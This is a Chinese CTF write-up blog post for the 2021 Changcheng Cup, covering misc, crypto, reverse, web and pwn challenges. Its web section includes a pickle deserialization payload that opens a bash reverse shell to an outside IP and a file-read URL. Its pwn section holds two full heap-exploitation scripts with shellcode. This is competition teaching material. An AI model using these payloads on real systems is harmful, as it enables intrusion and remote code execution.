2021 长城杯ctf wp

最新推荐文章于 2024-06-02 09:42:31 发布
最新推荐文章于 2024-06-02 09:42:31 发布
阅读量4.7k 收藏 23
点赞数 7
分类专栏: CTF-Writeup 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45603443/article/details/120385610
版权

2021 长城杯 wp

Misc

签到

16进制—ASCII—base64
在这里插入图片描述在这里插入图片描述

你这flag保熟吗

下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码
从图⽚可以提取出两个rar
在这里插入图片描述在这里插入图片描述
得到⼀个excel和⼀个hint
在这里插入图片描述
hint中提示base64:(,还有⼀串不知所云的base64
excel中是分开来的单元格,每⼀个单元格都有⼀个字符串
尝试把hint中的base64带进excel,画图
在这里插入图片描述是⼀个⼆阶的希尔伯特曲线,那么我们可以根据希尔伯特曲线写脚本来提取字符串得到base64(与qwb的threebody相似)

import numpy as np
from PIL import Image
from hilbertcurve.hilbertcurve import HilbertCurve
import pandas as pd
arr = pd.read_excel('./password.xls',header=None)
# arr = arr.values()
# with Image.open('threebody_new.bmp') as img:
# arr = np.asarray(img)
# arr = np.vectorize(lambda x: x&1)(arr[:,:,2])
# for x1 in range(np.size(arr,0)):
# if sum(arr[x1])>0:
# break
# for x2 in reversed(range(np.size(arr,0))):
# if sum(arr[x2])>0:
# break
# for y1 in range(np.size(arr,1)):
# if sum(arr[:,y1])>0:
# break
# for y2 in reversed(range(np.size(arr,1))):
# if sum(arr[:,y2])>0:
# break
#
# arr = arr[x1:x2+1, y1:y2+1]
hilbert_curve = HilbertCurve(17, 2)
s = ''
for i in range(np.size(arr)):
 [x,y] = hilbert_curve.point_from_distance(i)
 s += str(arr[y][x])
print(s)
# with open('output', 'wb') as f:
# f.write(int(s,2).to_bytes(2048, 'big'))

得到⼀⼤串base64,以及底下很多的“=”号,删除到只剩两个“=”号,循环解码

with open("flag.txt",'r') as f:
 a = f.read()
import base64
while True:
 a = base64.b64decode(a)
 print(a)

在这里插入图片描述
得到压缩包密码
1f_y0u_h4ve_7he_fllllllag,_I_muSt_vvant_1t!
打开压缩包,看到flag.php,是⼀⼤堆brainf**k,尝试解码未出,⼀直输出error
之后上github找到⼀个⽹站
在这里插入图片描述
可以观察brainfuck的栈
将整⼀个brainfuck全都扔进去
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述将两个字符串全都提取出来,转为ascll
在这里插入图片描述
最后进⾏atbash解码
在这里插入图片描述

Crypto

baby_rsa

爆破v,m解出flag1

from Crypto.Util.number import *
c=158087739211657463782246495540327740951985317824559041695522233035139409682928968141592884174
99220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805
90413409990182685836777838634237676850803155480224907507236671003888930626880674417908664868473
80230734589829060669723404143989284111479705939352440779254487327724736197830793283515222691708
79807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341
11522751516354570945474627251482700060185373535655149568522999563748350673544890065688536535343
4308639412035003119516693303377081576975540948311
for m in range(1024,2,-1):
 v=2
 p=pow(v, (m+1))-pow((v+1), m)
 while p.bit_length()<=1024:
 if isPrime(p):
 d=inverse(0x10001,p-1)
 text=long_to_bytes(pow(c,d,p))
 if len(text)==21:
 print(v,m)
 print(text)
 v+=1
 p=pow(v, (m+1))-pow((v+1), m)

最后⼀个因⼦不⼩于513位,⽽flag2⼩于512位,分解最后⼀个因⼦,按rsa解密得到flag2

from Crypto.Util.number import *
c,n,d=
(4062598101725026294523054845073895172556652025216341012456562212675473969368127164912710410903
81648527877672964036974624754596705408458221503976399230132231029126747484024275015880188664908
78394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654
12769174394411207570381404362259953049610071337869676187998254267991763157045107210789334879281
73216525934717949742271834767329806238354839910670803451849784821913424306274903985169127144519
84152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314
400518151019955104989790911460357848366016263083,
43001726046955078981344016981790445980199072066019323382068244142888931539602812318023095256474
93969725780264615034854677964754515228815860755523930288768913764574862842124768522546334611808
12387180497013207262954353767332156814157742552584194186614660104039285912429614341787308465374
71236142683517399109466429776377360118355173431016107543977241358064093102741819626163467139833
35245409447222934959847935836720345245260683379648311189207634374595839493213219944271804872063
35563104670192224346937854239966563066122627146090761196348147834381118437736495191011693260727
93596027594057988365133037041133566146897868269,
39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557
011554851873068389016629085963086136116425352535902598378739)
p=
[191,193,627383,1720754738477317127758682285465031939891059835873975157555031327070111123628789
833299433549669619325160679719355338187877758311485785197492710491]
phi=1
for i in p:
 phi*=i-1
# print(d)
dd=inverse(0x10001,phi)
print(long_to_bytes(pow(c,dd,d)))

Reverse

Just_cmp

原题

https://blog.csdn.net/weixin_43876357/article/details/107875824

#-*- coding:utf-8 -*-
enc = "flag{********************************}"
m = [0x0A07370000000000, 0x380B06060A080A37, 0x3B0F0E38083B0A07, 0x373B0709060B0A3A,
0x0F38070F0D]
import binascii
flag = b''
for i in range(5):
 p = enc[i*8:(i+1)*8]
 a = binascii.b2a_hex(p.encode('ascii')[::-1])
 b = binascii.a2b_hex(hex(int(a,16) + m[i])[2:])[::-1]
 flag += b
print (flag)

funny_js

先编译 linux 的库,然后使⽤这⼀套尝试运⾏,报错在这里插入图片描述
版本不对,从⽀持 bigint 的版本开始试,发现2020-01-
19 就可以运⾏了,采⽤上⾯同样的代码运⾏

因为ida⾥头看字节码发现有 rc4 的字样,密钥也在附近,似乎是2021quickjs_happygame
在这里插入图片描述
直接找密钥,考虑到⼀定有⼀个⽐较的步骤,所以直接改源码在 op_eq 加个hook
在这里插入图片描述
得到密⽂

cipher = [150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 64, 106, 103,
 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 107, 131, 223, 122, 229,
157

然后就直接 cyberchef 解 rc4 但是接出来完全不对
考虑还有别的操作,⽽flag格式为 flag{***},开始各种尝试,发现亦或的字符应该为 39,直接就cyberchef解了
在这里插入图片描述

Web

java_url

原题 payload直接打

http://eci-2zeb5ty7ty8rni5x7hr0.cloudeci1.ichunqiu.com/testURL?url=url:file:///flag

ez_python

右键查看源代码有/?pic=1.jpg,base64读⽂件
直接读app.py
在这里插入图片描述
在这里插入图片描述
发现pickle,并且有过滤R,⼀个opcode往上打
脚本

import requests
import base64
url = "http://eci-2zea2edqz7xfw48r9zj2.cloudeci1.ichunqiu.com:8888/"
opcode=b'''(S'bash -c "bash -i >& /dev/tcp/101.32.201.44/9999 0>&1"'
ios
system
.'''
headers={"Cookie":"user={}".format(str(base64.b64encode(opcode),encoding='utf-8'))}
requests.get(url,headers=headers)

弹个shell,得flag
在这里插入图片描述

Pwn

K1ng_in_h3Ap_I

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
 # try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 gdb_text='''
 telescope $rebase(0x202040) 16
'''
 if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=remote('47.104.175.110',20066)
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def choice(a):
 io.sendlineafter('>> \n',str(a))
 def add(a,b):
 choice(1)
 io.sendlineafter(':\n',str(a))
 io.sendlineafter(':\n',str(b))
 
 def edit(a,b):
 choice(3)
 io.sendlineafter(':\n',str(a))
 io.sendafter(':\n',b)
 def show():
 choice(666)
 def delete(a):
 choice(2)
 io.sendlineafter(':\n',str(a))
 add(0,0x88)
 add(1,0x68)
 add(2,0x68)
 add(3,0x88)
 add(4,0xf0)
 add(5,0xf0)
 show()
 io.recvuntil('0x')
 libc_base=int(io.recv(6),16)-libc.sym['printf']
 # libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
 delete(0)
 edit(3,'\x00'*0x80+p64(0x200)+'\x00')
 delete(4)
 delete(1)
 add(0,0x88)
 delete(0)
 add(0,0xc8)
 edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['_IO_2_1_stdout_']-0x43)[:3]+'\n')
 add(1,0x68)
 add(3,0x68)
 edit(3,'\x00'*0x33+p64(0xfbad1887)+p64(0)*3+'\x88'+'\n')
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stdin_']
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 free_hook_addr=libc.sym['__free_hook']
 delete(1)
 edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'\n')
 add(1,0x68)
 add(3,0x68)
 edit(3,'\x00'*0x13+p64(libc_base+one_gadgaet[2])+'\n')
 delete(1)
 delete(1)
 
 
 success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 
 # gdb.attach(io,gdb_text)
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

K1ng_in_h3Ap_II

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
# try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 gdb_text='''
 telescope $rebase(0x202080) 16
 '''
 if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so')
 io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 # clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so')
 io=remote('47.104.175.110',61608)
 # clibc.srand(clibc.time(0))
 libc=ELF('./libc.so.6')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def choice(a):
 io.sendlineafter('>> \n',str(a))
 def add(a,b):
 choice(1)
 io.sendlineafter(':\n',str(a))
 io.sendlineafter(':\n',str(b))
 
 def edit(a,b):
 choice(3)
 io.sendlineafter(':\n',str(a))
 io.sendafter(':\n',b)
 def show(a):
 choice(4)
 io.sendlineafter(':\n',str(a))
 def delete(a):
 choice(2)
 io.sendlineafter(':\n',str(a))
 add(0,0x50)
 add(1,0x50)
 add(2,0x50)
 for i in range(7):
 edit(2,'\x00'*0x10)
delete(2)
 delete(0)
 delete(1)
 io.sendlineafter('>> \n','1'*0x500)
 show(0)
 
 
 libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10-0xb0
 libc.address=libc_base
 bin_sh_addr=libc.search('/bin/sh\x00').next()
 system_addr=libc.sym['system']
 free_hook_addr=libc.sym['__free_hook']
 edit(2,p64(free_hook_addr)+'\n')
 add(0,0x50)
 add(1,0x50)
 add(2,0x50)
 add(3,0x50)
 add(4,0x50)
 add(5,0x30)
 add(6,0x50)
 free_hook_addr=libc.sym['__free_hook']
 new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000
 shell1='''
 xor rdi,rdi
 mov rsi,%d
 mov rdx,0x1000
 xor rax,rax
 syscall
 jmp rsi
 '''%new_shell_code_head_addr
 pay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)
 edit(1,pay)
 srop_mprotect=SigreturnFrame()
 srop_mprotect.rsp=free_hook_addr+0x8
 srop_mprotect.rdi=new_shell_code_head_addr
 srop_mprotect.rsi=0x1000
 srop_mprotect.rdx=4|2|1
 srop_mprotect.rip=libc.sym['mprotect']
 edit(5,str(srop_mprotect)[0x60:0x90]+'\n')
 edit(6,str(srop_mprotect)[0xa0:0xd0]+'\n')
 delete(4)
 shell2='''
 mov rax,0x67616c662f2e
 push rax
 mov rdi,rsp
 mov rsi,0x0
 xor rdx,rdx
 mov rax,0x2
syscall
 mov rdi,rax
 mov rsi,rsp
 mov rdx,0x100
 mov rax,0x0
 syscall
 mov rdi,0x1
 mov rsi,rsp
 mov rdx,0x100
 mov rax,0x1
 syscall
 '''
 io.sendline(asm(shell2))
 
 
 
 success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 
 # gdb.attach(io,gdb_text)
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

Tip

你是否想要加入一个安全团队
拥有更好的学习氛围?

那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

欢迎各位大佬小白入驻,大家一起打CTF,一起进步。

我们在挖掘,不让你埋没!

你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。

有意向的师傅请联系邮箱root@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)

EDI安全
关注
  • 7
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记一次CTF过程(Writeup)
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP 解题报告 本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021WEB 部分中,我们遇到了一...
第一届长城杯 部分WP
mumuzi的博客
09-19 2590
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
2021 BugkuCTF长城杯“ ——“你这flag保熟吗“ 详解
Mutsa的博客
02-21 2268
废话:第一次参加CTF比赛,啥也不会,去刷刷真题吧,刷到21年“长城杯”Misc题--“你这flag保熟吗”。下载解压,两张图片一个压缩包,解压要密码,像这种有压缩包要密码,还有图片或者其他文件的,直接不要去想暴力破解了。将图片分离得到一个passwor.xls和hint.txt。两个都打开了,看不出来啥,直接网上搜WP。好!搜来的题解看了,更加懵了,什么希尔伯特曲线,什么brainfuck(BF)密码,什么BF执行的栈,什么atbash密码。学了好久,记录一下。
探索解谜之旅:CTF-write-ups 全面解析
最新发布
gitblog_00068的博客
06-02 304
探索解谜之旅:CTF-write-ups 全面解析 项目地址:https://gitcode.com/pcw109550/write-up 如果你对信息安全挑战赛(Capture The Flag,简称CTF)中的加密和区块链问题有浓厚兴趣,那么这个开源项目——CTF write-ups 将是你不容错过的宝藏。这里详尽记录了一系列由作者亲身参与并解决的难题,涉及多种尖端技术和算法应用。 项目介绍 ...
CTF新生赛之Writeup
shikaku_的博客
11-27 4250
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
网络安全实验室CTF—脚本关 writeup
Senimo
08-02 3364
网络安全实验室CTF—脚本关 writeupkey又又找不到了快速口算这个题目是空的怎么就是不弹出key呢?逗比验证码第一期逗比验证码第二期逗比验证码第三期(SESSION)微笑一下就能过关了逗比的手机验证码激情燃烧的岁月验证码识别XSS基础关XSS基础关2:简单绕过XSS基础关3:检测与构造Principle很重要的XSS 网络安全实验室CTF链接 key又又找不到了 快速口算 这个题目是空的 ...
【BUUCTF Web】WriteUp超详细
qq_62604985的博客
07-10 1918
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
第一届长城杯初赛部分wp(个人解题思路)
qq_74806534的博客
04-05 1432
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
CTF练习题WP1
m0_73891130的博客
03-25 615
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
第一届“长城杯”信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 986
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7692
BUUCTF题目Misc部分wp(持续更新)
2021长城杯”_MISC_“你这flag保熟吗”_复现
weixin_46245411的博客
09-21 1802
直接解压“flag.rar”发现存在密码,而且4~6位密码爆破失败,说明密码的获取要从另外的两个PNG图片获取。 直接将图片都拿去binwalk分解一下(binwalk -e 1.png)、(binwalk -e 2.png) 分别得到一个“password.xls”文件以及一个“hint.txt” 单独看password.xls 看不懂,但是看hint.txt就比较明显,有base64解码,而且还有类似于加密后的信息“Vm0wd2QyUXlVWGxW”,但是直接拿去解码是得不到什...
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1146
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1229
【人,终究会被年少不可得之物困其一生】
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值